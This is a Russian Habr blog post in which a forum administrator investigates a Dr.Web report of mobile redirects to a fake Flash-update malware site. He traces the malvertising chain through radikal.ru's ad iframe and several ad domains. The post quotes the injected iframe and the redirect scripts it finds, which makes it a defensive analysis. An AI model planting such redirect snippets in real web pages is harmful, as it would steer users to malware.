Как стать автором
Обновить

Вирусы с радикала. Опять!

Время на прочтение3 мин
Количество просмотров9.2K
История началась с смски «срочно выйди в скайп» — писал клиент, хозяин одного из сайтов, которому я помогаю в обеспечении жизнедеятельности этого самого сайта. Оказалось, он получил письмо от некоего Alexander Goryachev с утверждением, что сайт скорее всего заражен.

Вот текст письма:

Здравствуйте.

Меня зовут Александр Горячев, я аналитик компании «Доктор Веб».

Имеется информация, что при открытии изображений в данной теме yarportal.ru/topic324608s0.html на формуе yarportal.ru происходит переадресация с сайта-хостинга radikal.ru на мошеннический сайт, который распространяет вредоносные программы для мобильных устройств под видом обновлений ПО. То есть если используется мобильное устройства (телефон, смартфон), то сначала открывается страничка radikal.ru с нужным изображением, но затем почти сразу происходит перенаправление на мошеннический сайт (пример — newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413). Если открывать изображения непосредственно на самом хостинге, без промежуточного звена в лице yarportal.ru, такого поведения не наблюдается. Возможно, yarportal.ru был взломан или на нем используется недобросовестная рекламная модель, о которой владельцы портала могут и не знать.

Из контактной информации наиболее подходящим был ваш, поэтому было решено сообщить по нему. Можете ли вы как-то прокомментировать ситуацию и заняться решением данного вопроса? Будем признательны, если вы сможете предоставить какую-либо информацию.

Спасибо.


Сайт представляет из себя достаточно большой форум, соответственно юзеры выкладывают картинки куда угодно, а потом ставят туда ссылки в том виде, который им показывает картинкохостинг. Радикал, увы, один из самых популярных.

Попытался повторить действия аналитика и посканить трафик, который при этом идет на мобильное устройство. Действительно, редирект на этот самый newbrwzer происходит, но не совсем понятно, при чем тут наш сайт. Анализ трафика показал, что вредоносную ссылку выдает сам радикал примерно следующим путем:

$ curl -s http://radikal.ru/F/s45.radikal.ru/i107/1205/76/593cc990c6ae.jpg.html | grep adv-port
<script>document.write('<iframe border="0" marginwidth="0" marginheight="0" src="http://adv-port.com/view2.php?title='+document.title+'&referrer='+document.referrer+'&lang='+navigator.language+'"frameborder="0" height="120" scrolling="no" width="240"></iframe>');</script>


Далее это отсылает браузер на страницу вида:
http://adv-port.com/view2.php?title=%D0%A0%D0%B0%D0%B4%D0%B8%D0%BA%D0%B0%D0%BB-%D0%A4%D0%BE%D1%82%D0%BE%20::%20%D0%A3%D0%B2%D0%B5%D0%BB%D0%B8%D1%87%D0%B5%D0%BD%D0%BD%D0%BE%D0%B5%20%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5&referrer=http://yarportal.ru/topic324608s0.html&lang=en


Где встречается следующий код:
<script src="http://adv-port.com/ctr.php?ref='+document.referrer+'"></script>


По ссылке adv-port.com/ctr.php?ref='+document.referrer+' имеется следующий код:
function error() {
 top.location='http://network-sitead.com/';
}


По этой ссылке есть следующий код:
<script src='http://on-line-adv.com/2.php'></script>


Загрузка этой ссылки выдает следующее:
document.location='http://newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413'


Т.е. в конце-концов браузер действительно попадает на страничку с предложением «обновить» флеш-плеер. Чуть позже выяснилось, что некоторые пользователи действительно «обновляют» его: yarportal.ru/topic332505.html

По итогам этого «расследования» возникает 3 вопроса:
  1. Когда радикал умрет с такой своей рекламной политикой? Это уже далеко не первый случай распространения вирусов через них.
  2. Откуда в Dr.Web берут аналитиков, которые не удосуживаются посмотреть на трафик через wireshark/tcpdump?
  3. А может это просто я дурак и сайт действительно заражен? :)


PS: Аналитик действительно имеет отношение к Dr.Web, его статья есть на хабре в оф. блоге компании habrahabr.ru/company/drweb/blog/142993

UPD: не использовать радикал — это, конечно, отличная мысль, жаль, очень близка к утопии. Куда более интересно, почему там регулярно появляются вирусы, и сколько еще вот таких же «обновлений» успело поставиться с этого сайта, аудитория у радикала ого-го )

UPD2: не надо предлагать альтернативы радикалу, я их и так знаю, спасибо.
Теги:
Хабы:
Всего голосов 73: ↑59 и ↓14+45
Комментарии108

Публикации

Истории

Работа

Ближайшие события

27 августа – 7 октября
Премия digital-кейсов «Проксима»
МоскваОнлайн
19 сентября
CDI Conf 2024
Москва
20 – 22 сентября
BCI Hack Moscow
Москва
24 сентября
Конференция Fin.Bot 2024
МоскваОнлайн
25 сентября
Конференция Yandex Scale 2024
МоскваОнлайн
28 – 29 сентября
Конференция E-CODE
МоскваОнлайн
28 сентября – 5 октября
О! Хакатон
Онлайн
30 сентября – 1 октября
Конференция фронтенд-разработчиков FrontendConf 2024
МоскваОнлайн
3 – 18 октября
Kokoc Hackathon 2024
Онлайн